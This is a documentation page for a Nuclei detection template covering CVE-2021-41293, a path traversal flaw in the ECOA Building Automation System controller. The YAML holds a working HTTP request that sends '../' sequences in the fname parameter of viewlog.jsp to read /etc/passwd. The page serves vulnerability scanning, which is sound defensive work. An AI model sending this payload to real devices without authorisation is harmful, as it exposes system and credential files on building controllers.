Skip to content
Nuclei Templates

ECOA Building Automation System - Arbitrary File Retrieval

ID: CVE-2021-41293

Severity: high

Author: 0x_Akoko

Tags: cve2021,cve,ecoa,lfi,disclosure

Description

Section titled “Description”

The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the ‘fname’ POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.

YAML Source

Section titled “YAML Source”
id: CVE-2021-41293


info:
  name: ECOA Building Automation System - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41293
    cwe-id: CWE-22
    epss-score: 0.02626
    epss-percentile: 0.90324
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve2021,cve,ecoa,lfi,disclosure


http:
  - raw:
      - |
        POST /viewlog.jsp HTTP/1.1
        Host: {{Hostname}}


        yr=2021&mh=6&fname=../../../../../../../../etc/passwd


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a0046304402203a46523ef4939b01d1f8ac4bb6b980639dd59e58e8a8df0c9f8a28c59df6ab20022025b55f5532219274a0769613c3095522b437acb48a821c016d145055d29b3db9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41293.yaml"

View on Github